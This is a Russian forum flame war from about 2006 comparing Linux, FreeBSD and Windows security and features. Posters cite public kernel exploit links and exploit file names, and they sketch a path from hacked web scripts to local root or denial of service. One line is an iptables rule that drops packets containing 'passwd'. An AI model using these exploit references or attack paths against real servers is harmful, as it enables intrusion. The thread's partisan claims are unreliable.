Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 ... 7 8 9 10 11 След.
RSS
В 2007 году господству Windows придет конец
 
Цитата
Хренсмаслом пишет:
Если вам нужно просто расшарить интернет (2 канала на 2 различных сети), то это элементарно делается через ICS (например в св-вах подключения), там же выбирается для какой локальной сети расшаривать данное подключение.
да? и даже если сеть 10/8 ?
когда мы включаем ics, на внутреннем интерфейсе автоматом ставится 192.168.0.1
В случае 2х локальных сетей у нас будет 2 интерфейса с адресом 192.168.0.1?
А если нужна балансировка нагрузки на внешние каналы? Или часть пользователей пускать через один внешний канал, а часть - через другой?
Цитата
Хренсмаслом пишет:
В случае если, как вы хотели, требуется автоматически переключить какую-либо локальную сеть на другой канал (переключить ICS шару) - это делается скриптом через wsh, и об этом я уже писал выше.
да-да... ping next hop. Но переключаться можно не только по полному падению канала, а когда его загруженность достигает определённой величины, либо задержки/потери выходят за рамки разумного.
Цитата
Хренсмаслом пишет:
В сырцах указано, что тестирован он и на Mozilla Firefox 1.5.0.0 on Linux.
Хотя та уязвимость под любую версию Фаерфокса.
Есть проблема: адреса библиотек, хипа, стека варьируются в зависимости от версии компилятора, glibc и пр., не говоря о дистрибутивах с ASLR. Возьмите простой хелловорлд, скомпилируйте его несколько раз, считая md5 от получаемого бинарника каждый раз.
Цитата
Хренсмаслом пишет:
Кстати Nvidia например практикует внедрение аппаратного фаервола, что является ещё более быстрым решением.
а в чём его аппаратность?
Цитата
Хренсмаслом пишет:
Если они умеют больше, чем squid, то и кол-во процедур проверки, которые проходит каждый пакет будешь больше, и соответственно скорость работы будет ниже, чем у squid.
Если это простой прокси-сервер с меньшей, чем у squid функциональностью, то и скорость работы будет выше.
речь не об этом.
раз
два
PS:А хоть одна из этих proxy могут быть http-акселератором?
 
Цитата
Хренсмаслом пишет:
и всевозможные компиляторы под различные никем не используемые языки,
Если вы пытаетесь скомпилировать что-то на ruby, prolog, python, то тады "ой"

Цитата
Хренсмаслом пишет:
Жил себе спокойно "безопасный" FireFox, стал он чуть популярнее и поехали... свеженький Remote Command Execution (07 февраля, 2006) - http://www.securitylab.ru/poc/262192.php и это уже вторая такая крупная уязвимость в firefox-е за последнее время.Чем популярнее браузер, тем больше им пользуются и тем больше потенциальная поражаемая аудитория. Именно поэтому баги ищут в основном в популярных браузерах.Так что не IE единым, да и на IE если отключить ActiveX, а ещё лучше JS, то практически никак его эксплуатировать не удастся.
И где черви под него, где массовая зксплуатация уявимостей ? Тем более, что его доля в инете растет...


spherix@hosting ~ $ uname -or
2.4.32-hardened-r1 GNU/Linux
spherix@hosting ~ $
hosting ~ #grep -v ^'#' /boot/Config |grep GRK
CONFIG_GRKERNSEC=y
CONFIG_GRKERNSEC_CUSTOM=y
CONFIG_GRKERNSEC_PAX_HAVE_ACL_FLAGS=y
CONFIG_GRKERNSEC_KMEM=y
CONFIG_GRKERNSEC_IO=y
CONFIG_GRKERNSEC_PROC_MEMMAP=y
CONFIG_GRKERNSEC_BRUTE=y
CONFIG_GRKERNSEC_HIDESYM=y
CONFIG_GRKERNSEC_ACL_HIDEKERN=y
CONFIG_GRKERNSEC_ACL_MAXTRIES=3
CONFIG_GRKERNSEC_ACL_TIMEOUT=30
CONFIG_GRKERNSEC_PROC=y
CONFIG_GRKERNSEC_PROC_USER=y
CONFIG_GRKERNSEC_PROC_ADD=y
CONFIG_GRKERNSEC_LINK=y
CONFIG_GRKERNSEC_FIFO=y
CONFIG_GRKERNSEC_CHROOT=y
CONFIG_GRKERNSEC_CHROOT_MOUNT=y
CONFIG_GRKERNSEC_CHROOT_DOUBLE=y
CONFIG_GRKERNSEC_CHROOT_PIVOT=y
CONFIG_GRKERNSEC_CHROOT_CHDIR=y
CONFIG_GRKERNSEC_CHROOT_CHMOD=y
CONFIG_GRKERNSEC_CHROOT_FCHDIR=y
CONFIG_GRKERNSEC_CHROOT_MKNOD=y
CONFIG_GRKERNSEC_CHROOT_SHMAT=y
CONFIG_GRKERNSEC_CHROOT_FINDTASK=y
CONFIG_GRKERNSEC_CHROOT_NICE=y
CONFIG_GRKERNSEC_CHROOT_SYSCTL=y
CONFIG_GRKERNSEC_CHROOT_CAPS=y
CONFIG_GRKERNSEC_CHROOT_EXECLOG=y
CONFIG_GRKERNSEC_AUDIT_MOUNT=y
CONFIG_GRKERNSEC_SIGNAL=y
CONFIG_GRKERNSEC_FORKFAIL=y
CONFIG_GRKERNSEC_TIME=y
CONFIG_GRKERNSEC_EXECVE=y
CONFIG_GRKERNSEC_SHM=y
CONFIG_GRKERNSEC_DMESG=y
CONFIG_GRKERNSEC_RANDPID=y
CONFIG_GRKERNSEC_RANDNET=y
CONFIG_GRKERNSEC_RANDSRC=y
CONFIG_GRKERNSEC_SYSCTL=y
CONFIG_GRKERNSEC_SYSCTL_ON=y
CONFIG_GRKERNSEC_FLOODTIME=10
CONFIG_GRKERNSEC_FLOODBURST=4

Дистрибутив Gentoo.
Сплоит в студию, пожалуйста.  


Цитата
Хренсмаслом пишет:
На процессор это действительно создаст нагрузку и я об этом сказал, если брандмауэр не умеет различать, фильтровать и отсеивать только нужные пакеты транспортного уровня.iptables разумеется этого не умеет и на этом уровне не работает.
Стоп. Речь была об изменении http-заголовков. Для этого и нужен ПРОЗРАЧНЫЙ сквид. А лазить внутрь пакетов iptables может.
Ставим POM и наслаждаемся:
iptables -A INPUT -m string --string 'passwd' -j DROP
 
Цитата
Хренсмаслом пишет:
Remote или локал, разницы не много.
это ещё почему?
Цитата
Хренсмаслом пишет:
Локальные эксплоиты под ядрышко линуксятины:
Linux Kernel Socket Buffer Memory Exhaustion DoS Exploit - http://security.nnov.ru/Fnews568.html
linux kernel msync race condition - http://security.nnov.ru/Enews925.html
exploit to Linux Vulnerability Allows Non-Privileged Users to Read Kernel Memory - http://security.nnov.ru/news4494.html
Linux kernel multiple bugs exploits and patches - http://security.nnov.ru/news4337.html
А вот паблики с секлаба:
Linux Kernel <= 2.6.11-rc3 Local Proof of Concept Exploit - http://www.securitylab.ru/poc/222131.php
Linux Kernel 2.6.11 sys_epoll_wait Local integer overflow Exploit - http://www.securitylab.ru/poc/222142.php
Linux Kernel "binfmt_elf" Core Dump Local Buffer Overflow Exploit - http://www.securitylab.ru/poc/222175.php
Linux Kernel 2.6.x "ioctl_by_bdev()" Local Denial of Service PoC Exploit - http://www.securitylab.ru/poc/222179.php
и много ли пользы от локальных DoS?
Цитата
Хренсмаслом пишет:
И это только под одно ядро... без учёта даемонов, которыми комплектуются дистрибутивы.
собственно, наличие чего-либо в дистрибутиве ещё ни о чём не говорит.  демон должен быть ещё установлен и запущен.
насчёт freebsd:
Цитата
Хренсмаслом пишет:
А теперь под FreeBSD-
Единственный эксплоит это как раз на kmem
http://security.nnov.ru/news4640.html
Цитата
Хренсмаслом пишет:
И это только под одно ядро... без учёта даемонов, которыми комплектуются дистрибутивы.

Цитата
Хренсмаслом пишет:
Только вот никто не пользуются этим Network File System :))
вы не правы.

Цитата
Хренсмаслом пишет:
Ах да фря не используется в top500 потому что это сложная система и просто так повырезать куски из неё не получится.
А может просто потому что в ней много где GIANT LOCK? Из-за чего скалится по числу процессоров плохо?
Ядро Linux больше чем ядро FreeBSD. И следуя вашей логике разумнее было брать именно ядро FreeBSD.
Вопли насчёт целостности... ну есть же Gentoo/kFreeBSD, есть Debian/kFreeBSD. Вырезали ведь.
 
Цитата
Хренсмаслом пишет:
Например, Ufraw не поддерживает Olympus SP-310, Olympus SP-350, Olympus E-330 (новый), Olympus Camedia C-70 Zoom, Olympus SP-320.
Ты это проверял? Я не верю в то, что производитель от нечего делает перелопачивает формат в каждой модели фотоаппарата и делает его несовместимым.

Цитата
Хренсмаслом пишет:
Ну и наконец, перепрошить фотоаппарат, передать изображение на монитор (для фотосессии например) или использовать фотоаппарат как веб-камеру с Ufraw ты не сможешь.
Ну что я могу сказать - с фотоаппарата картинки сливать имею возможность, с мобильника фотки и отснятое видео в т.ч. через Bluetooth, на мобильники заливать музыку и картинки, использовать GPRS, т.ч. через Bluetooth, цеплять флешки, резать сидюки и двдюки, слушать музыку, смотреть видео, смотреть твтюнер, все железо, установленное в ПК у меня полнофункционально работает и даже в виндовые игрушки, у которых нет линуксовых портов играть могу и софт виндовый вроде справочников и IDA использовать. Какое мне дело до проблем неудачника вроде тебя, который доказывает мне, что Linux плохой?
Меня и многих других пользователей Linux он вполне устраивает, в т.ч. на десктопе. Отсутвие поддержки или плохая поддержка от некоторых вендоров - проблемы этих вендоров, у которого Linux-пользователи просто перестанут покупать железки.
С приходом EFI в массы, а EFI уже идет на i955 чипсетах, проблемы с отсутвием драйверов уйдут в прошлое,  поддержка  EFI давно есть в Linux. В то время как юзеры ни XP, ни висты не смогут использовать EFI, а все благодаря тормознутой M$, которая забила на них болт в очередной раз, в погоне за рюшками забыв о функционале.

Цитата
Хренсмаслом пишет:
Линукс просто не позволяет по умолчанию такой функциональности как netbois Windows, или как RPCSS. А точнее по умолчанию она отключена.
Просто у Linux концепция безопасности по умолчанию наблюдается, в отличие от систем для домохозяек.

Цитата
Хренсмаслом пишет:
Что касается обработки RAW при помощи Ufraw - я уже писал, он не поддерживает очень большого кол-ва фотокамер, в том числе моей.
Ты это проверял? А я так считаю, что формат RAW у каждого из производителей не меняется от модели к модели, потому что производителям вот больше нечем заняться кроме как изобретать в каждой модели несовместимости.

Цитата
Хренсмаслом пишет:
Ах да, и не надо сравнивать "расширенный paintbrush" под названием GIMP с хорошим редактором вроде Photoshop. Да, ты можешь сравнить GIMP с ImageReady, но уж никак не с фотошопом.
GIMP уже плугины от фотошопа цеплять умеет, а мощь фотошопа в плугинах, не говоря уж про то, что обладает достаточно серьезным функционалом и без этого. Даже не знаю кому нужен этот фотошоп, да еще платный, кроме фанатов фотошопа, когда есть GIMP.

Цитата
Хренсмаслом пишет:
Во-вторых quick time его отлично проигрывает.
А удобная винда из коробки не умеет, в отличие от штатного софта в дистрибутиве Линукса. Виндовые юзеры должны искать какой-то QuickTime, качать и устанавливать, как все сложно .... еще оказывается и GUI не справляется с некоторыми задачами в винде, и бедные домохозяйки должны использовать консольный netsh...

Цитата
Хренсмаслом пишет:
Remote или локал, разницы не много.
Для того, чтобы добраться к шеллу нужно приложить немало усилий, а если включен GrSecurity или SeLinux, то шелла с помощью эксплоита ты не получишь и толку от твоих локальных эксплоитов будет 0.
А во фре куча УДАЛЕННЫХ уязвимостей, которые не зависсят от наличия о злоумышленника шелла на машине, за какие-то последние НЕСКОЛЬКО МЕСЯЦЕВ(а не то, что ты привел по линуксу за несколько последних ЛЕТ), при чем есть REMOTE ROOT в WIFI FreeBSD-SA-06:05.80211, который ты почему-то в упор не заметил, такие дела: твою дырявую фрю можно удаленно порутать через дырявое ядро. А то что ты не наблюдаешь эксплоит на паблике не означает того, что эксплоита нет. Ты ведь и локальный ROOT-эксплоит эксплоит к дырявому ядру фри на FreeBSD-SA-04:02.shmat не наблюдаешь, а он есть, как и на последнюю дыру в сендмайле FreeBSD-SA-06:13.sendmail дырявой фрибсд.
Так что хватит тут гнать про ужасную дырявость линукса и про святость дырявой  фри и рассказывать про безопасность винды с двумя последними дырами в TCP/IP, одна из которых, MS05-19, читай по слогам, УДАЛЕННОЕ ВЫПОЛНЕНИЕ КОДА С НАИВЫСШИМИ ПРИВИЛЕГИЯМИ,  которая ну никак не может сравниться с локальными багами в Linux, локальными DoS и с удаленным DoS в iptables(которая работает ТОЛЬКО при наличии правил с -j LOG, если таких правил нет - то и DoS нет вот так). Бага в iptables, кстати, аналогична по опасности ошибке во фревой pf.  
У Win2k3 встроенный файрвол по умолчанию не включен, поэтому нечего косить под дурачка, рассказывая, что в XP встроенный файрвол включен, поэтому винды неуязвимы - серверные винды в конфигурации по умолчанию уязвимы, у W2k3 на счету два удаленных рута в конфигурации по умолчанию - один в RPC, один - в TCP/IP, а XP так отметилась наличием более десятка дыр, поволяющих ВЫПОЛНЕНИЕ УДАЛЕННОГО КОДА С ПРИВИЛЕГИЯМИ LOCALSYSTEM В КОНФИГУРАЦИИ ПО УМОЛЧАНИЮ(RPC, RPC2, LSASS, Workstation, Messanger, PNP,UPNP, ...), Linux просто не в силах превзойти такое дырявое поделие по числу особо опасных  удаленных дыр в конфигурации по умолчанию.

Цитата
Хренсмаслом пишет:
Это просто у тебя руки кривые, нужно просто запретить входящие IGMP (номер протокола 2) через secpol.msc (>IP security), либо через netsh.
Как все сложно то - дружественная система для домохозяек требует лазить в консоли, прямо как в Linux, полу-GUI полуконсольный гибрид какой-то и после этого еще кто-то говорит о дружественности системы к простому пользователю, дырявой по умолчанию, у которой все подряд включено - и IGMP3 и RPCSS и нетбиос торчит сеть.

Цитата
Хренсмаслом пишет:
Гость, так что представь мне хотя бы ещё один эксплоит на перечисленные тобою баги во FreeBSD (кроме kmem разумеется)...
Для фрибсд большинство эксплоитов традиционно не выкладывают в паблик. Например FreeBSD local root на дырявое ядро фри, shmat.c - попробуй отыскать. А эксплоит на sendmail думаешь тоже миф? Эксплоит еще одну дыру в ядре FreeBSD-SA-05:02.sendfile валяется в паблике. А уж коли ты за год поднял баги линукса, то получай еще дыру в дырявой фре FreeBSD-SA-05:08.kmem и еще дыру FreeBSD-SA-05:07.ldt.asc и еще удаленный DoS в TCP/IP FreeBSD-SA-05:15.tcp.asc. Дырявая фря. :)

Цитата
Хренсмаслом пишет:
Но я уже сказал, что если у рута пароль типа h42gh9sdgskd, то этот эксплоит тебе ничего не даст.
А если у него пароль "root123" тоже ничего не даст? А если это сервер хостинга, то этот эксплоит даст многое - практически вечный доступ на шелл(правда не под рутом) и возможность спокойно ковырять систему до рута либо возможность устроить масс-дефейс.

Цитата
Хренсмаслом пишет:
А ну ещё есть на nfs - но это уже даемон, а не ядро, хотя конечно через mount запрос он может вызвать kernel panic... Только вот никто не пользуются этим Network File System :))
Ты в этом так уверен? Я, например, использую, только не дырявую реализацию NFS в дырявом ядра фри, а нормальную линуксовую ядерную реализацию NFS. Что ты все ее выгораживаешь - фанатизм не дает покоя?

Цитата
Хренсмаслом пишет:
Этот список - эксплоиты начиная от самых свежих и кончая теми, которым уже около одного года.
Гг самые свежие...

http://www.securitylab.ru/poc/222131.php - локальная бага, год и пара месяцев давности
http://www.securitylab.ru/poc/222142.php - локальная бага, год давности
http://www.securitylab.ru/poc/222175.php - локальная, почти год давности
http://www.securitylab.ru/poc/222179.php - локальный DoS, почти год давности
http://security.nnov.ru/news4494.html - год давности и пара месяцев, аналог дырок во фре, в т.ч. и очень свежих, позволяющих читать kmem во фре
http://security.nnov.ru/Enews925.html - почти год давности, лишь теоретическая возможность эксплуатация

Да им тут по году и больше и почти все - локальные,  из свежих - куча DoS, драйверной специфики, 64-битная специфики, чтение памяти через DRM, который не используется на серверах и прочая чушь, а у дырявой фри за несколько последних месяцев вон какая куча удаленных, включая REMOTE ROOT в WIFI в дырявом ядре, openssh дырявое(при чем только у фри, у Linux то openssh без OPIE), и IPSEC(тоже только у фри), удаленная DoS в дырявом NFS, дыра в sendmail(который не в SuSe ни в Debian не являются дефотным MTAу,  а в Gentoo является официально нерекомендованным) и дыры в pf и ipfw, дыра в kmem... А если за год прикинуть?

Цитата
Хренсмаслом пишет:
Так что под ядро с 2003 года только один более менее серьёзный эксплоит - это kmem.
Порутанные с помощью одного из многих приватных эксплоитов на общеизвестные дыры в shmat, linux emulator, sendmail и многие другие дыры дырявой фри, считают иначе, а против 0day дырок фря ничего толком предложить, кроме изоляции с помошью jail(что не спасет от получения шелла и  эксплуатации дыры в ядре) и не может, поскольку аналогов SELinux, GrSecurity/PAX и OpenWall нет.

Цитата
Хренсмаслом пишет:
На процессор это действительно создаст нагрузку и я об этом сказал, если брандмауэр не умеет различать, фильтровать и отсеивать только нужные пакеты транспортного уровня.
iptables разумеется этого не умеет и на этом уровне не работает.
Еще раз продемонстрировал свою некомптентность. Linux разумеется умеет и на этом уровне работает http://l7-filter.sourceforge.net(Kernel modules for layer 7 iptables filtering).

Цитата
Хренсмаслом пишет:
На все твои оставшиеся цитаты я отвечать не буду, так как там кроме твоего подросткового флейма ничего технически грамотного нет. Всякие сказки про конфликты RRAS в 2k с Исой или дырка в chfn, якобы специфичная только для SuSe, хотя эту дырку ты сам предложил придумать для более удобного представления, а теперь берёшь её как аргумент.
Да просто тебе ответить нечего, а мозгов разобраться с chfn не хватает.  Так вот спецаильно для таких поясняю, администрируя ISA 2000 на Windows 2000 неоднократно имел возмождность наблюдать конфлик ISA и RRAS, когда при настроенном через RRAS PPTP сервере или dialin-сервере после перезарузки ISA не может запуститься - гребаная MS ISA конфликтует с гребаным MS RRAS, поэтому можешь кому угодно вешать лапшу на уши своим детским лепетом, а еще при следовании рекомендации мелкософт как вообще отключить IGMP (IgmpLevel 0) у сраной винды отваливается DHCP с ошибкой 1043(не могу найти активных интерфейсов). Остальные претензии к угребищности ISA тоже взяты не с потолка.
А насчет chfn объясняю еще раз для тупых: ошибка имеет место быть ТОЛЬКО в дистрибутивах SuSe и SLES, потому что проблема в патче, наложенном на chfn в этом дистрибутиве. Или для тебя является сюрпризом тот факт, что дистростроители патчат по-своему свои дистрибутивы, в т.ч. ядра и утилиты(у RedHat навскидку из утилит adduser патченая, не говоря уже про ядро с Execshield и многими другими патчами). Не веришь? Тогда вперед качать SRPM от сузи(пакет shadow вроде) и фтыкать чего они там за дырок напатчили. А еще недавно была ошибка раскрытия учетных записей в логе, специфичная для Ubuntu. Плюс среди посчитанных ошибок полно ошибок в отключенном по умолчанию функционале либо отсутвующем в бинарных сборках(собрано без него) как, например, в linux-ftp-ssl, не говоря уже адвайзори по ошибкам в программах вроде Tuxpaint, программе рисования для детей(отсутсвующих напрочь на серверах), поэтому большинством "ошибок" меряльщики могут подтереться при рассмотрении конкретного дистрибутива Linux. Теперь ясно почему ошибки в ядрах, демонах и утилитах могут затрагивать только некоторые дистрибутивы?
Ау? Еще раз спрашиваю, где линк по сравнению числа ошибок в винде и линуксе на securityfocus, который ты упоминал?

Цитата
Хренсмаслом пишет:
Ах да фря не используется в top500 потому что это сложная система и просто так повырезать куски из неё не получится. А ядро линукса - валяется себе, "бери кто хочет ". Ну вот IBM взяли и обрезали, сделали из линукса сложный калькулятор и ты этим калькулятором гордишься...
Фря тормозная и плохо масштабируемая, поэтому и используется там Linux, чему и является доказательством Top500. А твои нелепые детские попытки выгородить фрю в свете фактов(Top500) выглядят смешно и никого не интересуют. А насчет вырезания кусков, так и вообще демонстрирует твою крайнюю некомпетентность во FreeBSD,  потому, что и во фре ядро также можно кастрировать при конфигурации. Ты вообще процедуру сборки ядра фри представляешь, боюсь спросить выполнял ли хоть раз в жизни или о фре только в книжках читал, да на картинках видел? :)
 
Цитата
Хренсмаслом пишет:
В дистрибутивах обычно столько ненужного мусора... и всевозможные компиляторы под различные никем не используемые языки, и всякие малофункциональные редакторы аля notepad, короче говоря - весь GPL мусор :)
А тебя кто этот мусор заставляет ставить? А вот юзер винды не хочет отбросов в виде дырявого и убогого атглюка(хочет The Bat) или ослиного IE(хочет Opera) или убогого WordPad(UltraEdit хочет) или жирного mediaplayer, а покупать в составе винды и получать установленными, даже если они ему нах не нужны, обязан.

Цитата
Хренсмаслом пишет:
Если под Windows идут функциональные продукты вроде Outlook, MSN, WMPlayer, да даже WordPad и прочее. То под линукс идут примитивные утилитки, которыми толком ничего нельзя сделать, зато в таком количестве...
Функциональные... буагагаг. MSN не умеет ICQ, SIM - умеет и MSN и Jabber и ICQ и пр, как и kopete. Убогий Wordpad хоть текст в другой кодировке может редактировать не говоря уже про синтаксическую подсветку? Стандартные KWrite и Kate - умеют. Стандартный убогий Outlook Express не умеет много того, что умеют Evolution и KMail, даже к серверу MS Exchange подключится не сможет, в отличие от Evolution. WMPLayer без кодеков не умеет почти ничего, 3gp вон даже играть не умеет в отличие от Mplayer, с которым нет столько гимора по поиску и прикручиванию кодеков(а то некоорые кодеки под виндовый медиаплеер глючат по черному, тот же DivX некоторых версий с WinXP SP2, благодаря которому Explorer вешался при заходе в папку с  DivX-клипами).

Цитата
Гость пишет:
Еще раз продемонстрировал свою некомптентность. Linux разумеется умеет и на этом уровне работает http://l7-filter.sourceforge.net(Kernel modules for layer 7 iptables filtering).
iptables, конечно же, а не Linux.
 
насчёт кромсания freebsd. Тот кто говорит что покромсать сложно, ни разу не пользовался jail. Делается миниинсталл(20Мб), либо собирается мир в отдельную директорию. ненужное в ядре отключается через конфиг.
Цитата
Гость пишет:
фря ничего толком предложить, кроме изоляции с помошью jail(что не спасет от получения шелла и эксплуатации дыры в ядре)
только сама оболочка  должна быть в jail.
 
Цитата
^rage^ пишет:
только сама оболочка должна быть в jail.
Достаточно того, что с помощью int 0x80(x86) возможно воспользоваться в шеллкоде системными сервиссами, и с их помощью выполнить требущиеся действия либо с помощью syscalls залить на машину в jail свой интерпретатор команд ака шелл. ;)
 
Цитата

^rage^ писал:

это ещё почему?
Я уже писал почему. Вы видно невнимательно читали.

У нормальных пользователей на RAWSOCK висит брандмауэр, который просто не допускает все входящие пакеты на какие бы то ни было порты, не важно открыты ли они и прослушивают (0.0.0.0:0) или закрыты. Единственная возможность обойти - это и нужно чтобы сервер, на который зайдёт пользователь (а скорее всего это будет хттп-сервер) в ответном запросе послал гадкий пакет на открытый порт этой же tcp сессии, но такое трудноосуществимо.

Т.е. машина в интернете это либо не сервер - тогда на rawsock должен обязательно висеть брандмауэр, который просто не допустит входящих пакетов, либо это сервер в интернете, и тогда скорее всего это хттпд на котором выполняются всякие дырявые скрипты. Так вот хакиры сканируют такие сервера сотнями, после чего из дырявых скриптов получают права nobody и через локальный эксплоит имеют сервер.
Цитата

^rage^ писал:

и много ли пользы от локальных DoS?
Что касается локал DoS, может хакирам и не надо получать рута, может им нужно просто положить сервер для какой-то цели (например, конкуренция), а может и без цели. Тогда они посредствам дырки в каком либо скрипте, как я уже писал, получают заветное nobody,   после чего радостно кладут машину.
Да считается ли система безопасной, если её может положить любой скрипткиддис через локал DoS - ведь это уже не система, это дыра. И на различные такие дыры за последнее время под одно только ядро линукса написано около 8ми публичных эксплоитов.

Кстати ни одни только DoS эксплоиты есть под линукс.
Есть ещё публичный и на local root, например, linuxmsyncex.c, который я уже приводил, а ещё есть старый (01.2005) elflbl_v108.c

Кстати в конце этого сообщения я привёл список уязвимостей дыра линукса (под сотню). В том числе и опасные Remote DoS. Уж сколько под них наверное приватных эксплоитов.
Вот под фрю столько быть не может, так как уязвимостей там несравнимо меньше.
Но давайте сейчас (и до предпоследнего абзаца) забудем про приватные эксплоиты, и будем анализировать только те, что свободно доступны - т.е. только публичные. Грубо говоря, рассмотрим сначала только публичные эксплоиты, а уже затем (в конце моего сообщения) можно будет сравнить уязвимости и сделал вывод о приватных эксплоитах под эти уязвимости.
Цитата

^rage^ писал:

собственно, наличие чего-либо в дистрибутиве ещё ни о чём не говорит. демон должен быть ещё установлен и запущен.
Популярные стандартные демоны, которые запускаются с привилегированными правами на большинстве хостинговых серверов.
Цитата

^rage^ писал:

вы не правы.
Это вы не правы, я прав -
Действительно единственный кое-какой эксплоит под freebsd - это kmem(), ни DoS, ни рута вы через него не получите, а если у админа сложный пароль, то вы и его даже за 100 лет к хэшу не подберёте. Короче говоря даже kmem() бесполезен, но киддисы всё-равно будут искать сервера где у админов простые пароли, только поэтому я его и зачислил как эксплоит.
И касательно даемонов я прав, я перечислил только баги ядра линукса и эксплоиты под них, а если начать перечислять популярные даемоны линукса, то узявимостей будет намного больше.
Что касается Network File System - это уже даемон nfsd, но увы, он не особо популярный. И на хостинговых серверах он не используется. Кстати я опросил пять знакомых, которые пользуются FreeBSD, ни один из них не используется nfsd.
Цитата

^rage^ писал:

Ядро Linux больше чем ядро FreeBSD. И следуя вашей логике разумнее было брать именно ядро FreeBSD.
Больше не значит сложнее. Единственное что увеличивается пропорционально размеру кода - это кол-во потенциальных дыр в нём :)




Цитата

Гость писал:

Ты это проверял? Я не верю в то, что производитель от нечего делает перелопачивает формат в каждой модели фотоаппарата и делает его несовместимым.
В каждой модели специфичная механика, для работы с которой требуются различные функции, которые записывают в один и тот же формат различные обозначения. Может ваш ufraw и прочтёт формат, но распознать он все обозначения не сможет из-за одного только неверного  недокументированного байтика, из-за которого не будет возможности "понять" весь файл.

Цитата

Гость писал:

Ну что я могу сказать - с фотоаппарата картинки сливать имею возможность, с мобильника фотки и отснятое видео в т.ч. через Bluetooth, на мобильники заливать музыку и картинки, использовать GPRS, т.ч. через Bluetooth, цеплять флешки, резать сидюки и двдюки, слушать музыку, смотреть видео, смотреть твтюнер, все железо
Фотоаппарат - ты можешь только сливать файлы (не важно изображения или видео), но не сможешь перепрошить фотоаппарат, не сможешь передать изображение напрямую на монитор (для фотосессии например) и не сможешь использовать фотоаппарат как веб-камеру.
Мобильник - ты можешь попытаться подключить его и получить доступ к flex, но далеко не для всех моделей есть соответствующие интерпретаторы форматов чтения/записи flex. Мало того, ты не сможешь перепрошить телефон, копаться в еепромоме, bootcore, анлочить его, делать дампы и отлаживать тестпоинты в прошивке.
Да ты даже не сможешь управлять телефоном, максимум что позволяет kmobiletools и подобные утилиты - это чтение записной книжки, да и то оно не работает для большинства мобильных телефонов.
Так что когда ты выбираешь фотоаппарат или мобильный телефон тебе нужно сначала убедиться, что под них есть хотя бы какое-нибудь ПО для линукса.

Ах да толку от твоего EFI не много - замена биоса. И неизвестно хорошо ли то, что все запросы на железо будут передаваться на EFI драйверы, по сути дела это те же драйверы, только вынесенные отдельно. Я думаю, что такая "универсализация" команд в прошивки серьёзно сократит число программно настраиваемых возможностей.
Да и пока только Intel внедряет их в свои чипсеты, а девайсов никаких на массовый рынок под EFI так и не выпущено. Да и AMD не пользуется EFI. Думаю, что планы Intel по реализации EFI рухнут ещё быстрее, чем рухнули их планы по реализации шины Sistem I/O (Infiniband) (в пользу PCI Express). А если уж EFI будет реализована, то думаю, Майкрософт не заставит себя ждать.

Цитата

Гость писал:

и даже в виндовые игрушки, у которых нет линуксовых портов играть могу и софт виндовый вроде справочников и IDA использовать.
Ну, то что IDA есть и под линукс ни для кого не секрет.
"и софт виндовый"
То, что ты используешь - так это под всякими там vmware, либо wine.
Я тоже запускаю винду из под винды под vmware, либо VPC, либо 2os2, и могу с ней работать. Только скорость такой работы намного медленнее.
А также я могу использовать аналог Wine – cygwin (от нашего любимого Red Hat), если первый эмулирует винду под линуксом, то второй линукс под виндой. Но cygwin более или менее нормально эмулирует линукс, а вот wine - это кривая и тормозная вещь, так как алгоритмы, которые были заложены в Wine были получены реверс инженерией и они не являются абсолютными.
А что касается игрушек. Хех, интересно как это ты в них играешь на 1 fps, которые выдаёт Wine и уж тем более, если там используется DirectX.

Цитата

Гость писал:

Просто у Linux концепция безопасности по умолчанию наблюдается, в отличие от систем для домохозяек.
Просто у Windows функциональность по умолчанию намного выше, в отличие от систем для подростков-хакирей.

Цитата

Гость писал:

GIMP уже плугины от фотошопа цеплять умеет, а мощь фотошопа в плугинах, не говоря уж про то, что обладает достаточно серьезным функционалом и без этого. Даже не знаю кому нужен этот фотошоп, да еще платный, кроме фанатов фотошопа, когда есть GIMP.
GIMP это неудачная попытка создать клон Photoshop. Даже до ImageReady не дотянули.

Что касается плагинов фотошопа, неизвестный герой своровал методом реверс инженерии принцип работы фильтров с фотошопом и сделал плагин под винду (PSPI) в 2001 году, когда понял, что 8bf представляют собой практически нормальные DLL. Вот именно из-за этого "практически" PSPI работает далеко не со всеми плагинами Photoshop. Не мудрствуя лукаво он понял, что на линукс своё воровство портировать не получится, тогда он решил запускать pspi под wine! Разумеется под линуксовским wine скорость обработки изображений, особенно больших или с большим разрешением - упала в несколько раз :)

Цитата

Гость писал:

А удобная винда из коробки не умеет, в отличие от штатного софта в дистрибутиве Линукса. Виндовые юзеры должны искать какой-то QuickTime, качать и устанавливать, как все сложно ....
Конечно, потому что в коробке к линуксятине предлагается куча бесплатного мусора,  большая часть из которого не нужна. Бесплатный кодек QuickTime туда как раз входит.
То что он тебе пригодился это хорошо.
Если тебе нужен такой же мусор под винду, купи себе dvd с бесплатным хламом под Windows за 100 рублей.
Если ты не покупаешь, а качаешь из интернета (многие, в том числе я, предпочитают именно так и делать), то зачем ты качал гигабайты GNU мусора вместе со своим дистрибутивом?
Не проще ли скачать один K-Lite codec pack под Windows или codec pack от другого производителя и там будет кодеков в десять раз больше, чем прилагается в твоём дистрибутиве линуксятника.
Цитата

Гость писал:

еще оказывается и GUI не справляется с некоторыми задачами в винде, и бедные домохозяйки должны использовать консольный netsh
Windows могут пользоваться, как домохозяйки, так и профессионалы. Домохозяйки просто не будут пользоваться 99% доступных возможностей.
А вот вы, Гость, получается, знаете Windows ещё хуже, чем домохозяйки.
Так как те команды, что я перечислял под netsh, можно выполнить через различные оснастки гуишного MMC, например IPSEC через secpol.msc
А вот в системе для юных хакиров GUI приложения не настолько функциональны.
Цитата

Гость писал:

Для того, чтобы добраться к шеллу нужно приложить немало усилий,
Ага, особенно много усилий нужно чтобы поломать популярные дырявые скрипты форумов, CMS, чатов итд, уязвимости в которых обнаруживают чуть ли не каждый день.
Цитата

Гость писал:

а если включен GrSecurity или SeLinux, то шелла с помощью эксплоита ты не получишь и толку от твоих локальных эксплоитов будет 0.
А если включен DEP под Windows - то от твоих эксплоитов толку будет 0. Кстати для grsec есть свежая уязвимость от 2006 года - http://www.securityfocus.com/bid/16261
Цитата

Гость писал:

